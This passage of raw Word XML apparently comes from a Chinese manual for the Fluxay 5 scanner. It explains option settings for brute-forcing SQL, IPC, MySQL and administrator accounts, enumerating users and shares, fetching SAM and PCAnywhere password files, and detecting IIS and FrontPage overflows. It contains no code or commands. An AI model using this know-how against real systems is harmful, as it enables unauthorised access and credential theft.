            <wp:effectExtent l="0" t="0" r="63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23809" cy="3580952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>SQL扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770DC485" wp14:editId="66390D16">
            <wp:extent cx="4457143" cy="1780952"/>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57143" cy="1780952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6810" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6810"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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71"/>
        </w:trPr>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SA Password Via IIS: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尝试通过</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IIS</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的漏洞获得</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SA</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的密码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>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Brute Wick Password</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：尝试用简单的字典对</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的帐号进行暴力破解</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="371"/>
        </w:trPr>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SQL Server 2000 Information Gather</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SQL Server 2000</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>暴露的系统信息。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>IPC扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35B7FF0D" wp14:editId="6EC06B70">
            <wp:extent cx="4390476" cy="2266667"/>
            <wp:effectExtent l="0" t="0" r="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90476" cy="2266667"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6615" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6615"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="391"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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79"/>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Establish NULL Session: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尝试和目标主机建立空连接。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="391"/>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Enumerate Share Resource</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：枚举共享资源，并尝试是否具有密码保护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="379"/>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Enumerate User List</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：枚举用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="391"/>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Brute Force if Enumerate Succussifully: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果获得了用户列表，就尝试暴力破解。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="391"/>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Brute Force Administrators Group Only</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：仅仅尝试属于</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Administrators</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>组的用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果没有获得用户列表，就不会尝试暴力破解。流光</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中对</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的暴力破解采用了</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的机制，和以前版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用相比较，速度有大幅度提高。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>IIS扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66E6A018" wp14:editId="3898B507">
            <wp:extent cx="4419048" cy="2000000"/>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19048" cy="2000000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6300" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6300"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="406"/>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0C025B" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>选项说明（选项以选中为例进行说明）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="415"/>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0C025B" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="000C025B">
              <w:t xml:space="preserve">Unicode Holes: </w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扫描</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:t>Unicode</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="5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0C025B" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="000C025B">
              <w:t>FrontPage Extension</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：扫描是否安装了</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:t xml:space="preserve"> FrontPage </w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扩展</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="685"/>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0C025B" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="000C025B">
              <w:t>Try to Get SAM</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：尝试获得</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:t>SAM(Security Accounts Manager)</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="77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0C025B" w:rsidRDefault="004056D3" w:rsidP="00A749FC">
            <w:r w:rsidRPr="000C025B">
              <w:t xml:space="preserve">Try to Get PCAnywhere Password File: </w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尝试获得</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:t>PCAnywhere</w:t>
            </w:r>
            <w:r w:rsidRPr="000C025B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的密码文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Finger扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55658E21" wp14:editId="340A77DB">
            <wp:extent cx="4809524" cy="1523810"/>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09524" cy="1523810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6750" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6750"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="421"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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408"/>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Finger User: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从给定的用户列表中对用户进行过滤，尝试得到正确的用户名。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="421"/>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Enemurate User Name</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：对</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SunOS</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Sco</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统尝试获得用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>RPC扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10A4EDAB" wp14:editId="223E7C2F">
            <wp:extent cx="4800000" cy="1257143"/>
            <wp:effectExtent l="0" t="0" r="635"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00000" cy="1257143"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6600" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6600"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="457"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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443"/>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RPC Program ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获得</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>RPC</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>Program ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MISC扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="522EE05A" wp14:editId="6B61CF42">
            <wp:extent cx="4371429" cy="168571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71429" cy="1685714"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6989" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6989"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="427"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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et Bind Version: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>获得</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>BIND</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="427"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Brute MySQL Accounts</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：尝试获得</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>MySQL</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的帐号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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Get SSH Version</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：获得</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的版本号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3"/>
    <w:p w:rsidR="004056D3" w:rsidRPr="000C025B" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C025B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Plugin扫描设置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22590CC4" wp14:editId="4D4B835C">
            <wp:extent cx="4628571" cy="3780952"/>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28571" cy="3780952"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:r w:rsidRPr="003E3E5A">
        <w:t xml:space="preserve">　</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6555" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6555"/>
      </w:tblGrid>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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默认的插件说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="354"/>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FrontPage 2000 Extension Exploit: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t xml:space="preserve">FrontPage 2000 </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>扩展远程溢出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="365"/>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IIS 5.0 NULL .Printer Exploit: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>IIS5.0 NULL.Printer</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程溢出</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="354"/>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QPOP Verify User: </w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:t>QPOP</w:t>
            </w:r>
            <w:r w:rsidRPr="003E3E5A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>验证用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidTr="00A749FC">
        <w:trPr>
          <w:trHeight w:val="704"/>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Sun OS FTP CWD Verify Username: </w:t>
            </w:r>
